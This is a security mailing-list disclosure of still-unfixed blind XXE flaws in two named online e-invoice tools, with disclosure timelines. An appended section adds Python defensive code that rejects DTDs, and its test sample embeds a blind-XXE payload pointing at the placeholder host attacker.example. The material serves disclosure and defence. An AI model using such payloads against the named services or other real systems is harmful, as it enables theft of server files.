During tests of electronic invoicing tools, I discovered multiple XXE and Blind XXE vulnerabilities in online tools parsing electronic invoices in XML formats.
While most of the affected tools have fixed these vulnerabilities, two online tools remain vulnerable to Blind XXE attacks, allowing exfiltration of files. Disclosure to the affected operators happened more than 90 days ago.

Vulnerable tools:

https://validator.invoice-portal.de/
https://xrechnung.rib.de/ (only the visualization tool)

In both cases, uploading an invoice with a blind XXE payload leads to HTTP requests to the attacker's server and exfiltrates file content.

Proofs of concept, e.g., to exfiltrate /etc/hostname (ciibxxehostname.xml), can be found here:
https://github.com/hannob/invoicesec

Timeline validator.invoice-portal.de:
2025-11-17 Informed support contact about Blind XXE vulnerability, no reply
2026-02-16 Still vulnerable, public disclosure

Timeline xrechnung.rib.de:
2025-10-29 Reported "standard" XXE via contact form, no reply
2025-11-18 Re-test, incomplete fix: "Standard" XXE fixed, Blind XXE still possible
2025-11-18 Re-reported incomplete fix, no reply
2026-02-16 Still vulnerable, public disclosure

This was part of a larger research effort about the security of EU electronic invoices:
https://invoice.secvuln.info/

-- 
Hanno Böck - Independent security researcher
https://itsec.hboeck.de/
https://badkeys.info/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
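A defensive counterpart to the findings above, added here as an example that is not part of the original post or of the affected tools: a Python pre-check built on the standard-library expat parser that refuses any DOCTYPE or external entity (general or parameter, so both classic and blind XXE) before an uploaded invoice reaches the real processing pipeline. The sample invoices are constructed, and attacker.example is a placeholder host.

```python
import xml.parsers.expat as expat

class UnsafeXmlError(ValueError):
    """Raised when an uploaded invoice uses DTD features that enable XXE."""

def check_invoice_xml(data: bytes, allow_dtd: bool = False) -> dict:
    """Parse untrusted invoice XML, refusing external entity declarations and
    references; returns the root element name and element count on success."""
    parser = expat.ParserCreate()
    # Expat only fetches external DTDs / parameter entities when asked to.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    info = {"root": None, "elements": 0}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # CII and UBL invoices never need a DOCTYPE: reject it by default.
        if not allow_dtd:
            raise UnsafeXmlError("DOCTYPE not permitted in invoice upload")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # SYSTEM/PUBLIC entities are the XXE vector; a blind payload declares
        # a parameter entity that loads an attacker-hosted DTD, caught here too.
        if sysid is not None or pubid is not None:
            raise UnsafeXmlError(f"external entity {name!r} -> {sysid or pubid}")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXmlError(f"external entity reference -> {sysid}")

    def on_start(name, attrs):
        if info["root"] is None:
            info["root"] = name
        info["elements"] += 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)  # a raise inside a handler aborts the parse
    except expat.ExpatError as e:
        raise UnsafeXmlError(f"malformed XML: {e}") from None
    return info

def xxe_rejected(data: bytes, allow_dtd: bool = False) -> bool:
    """True if check_invoice_xml refuses the document."""
    try:
        check_invoice_xml(data, allow_dtd)
    except UnsafeXmlError:
        return True
    return False

# Constructed samples: a minimal CII invoice, the same document wrapped in a
# blind-XXE style DTD (placeholder attacker host), and a harmless internal DTD.
CII_NS = "urn:un:unece:uncefact:data:standard:CrossIndustryInvoice:100"
CLEAN_INVOICE = (f'<?xml version="1.0"?><rsm:CrossIndustryInvoice xmlns:rsm="{CII_NS}">'
                 '<rsm:ExchangedDocument><ID>INV-2026-001</ID></rsm:ExchangedDocument>'
                 '</rsm:CrossIndustryInvoice>').encode()
BODY = CLEAN_INVOICE.split(b'?>', 1)[1]
BLIND_XXE_INVOICE = (b'<?xml version="1.0"?><!DOCTYPE rsm:CrossIndustryInvoice ['
                     b'<!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">%ext;]>' + BODY)
INTERNAL_DTD_INVOICE = (b'<?xml version="1.0"?><!DOCTYPE rsm:CrossIndustryInvoice ['
                        b'<!ENTITY cur "EUR">]>' + BODY)
```

Running the check with the default allow_dtd=False rejects every DOCTYPE, which is the simplest policy for invoice uploads; allow_dtd=True still blocks any SYSTEM or PUBLIC entity.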
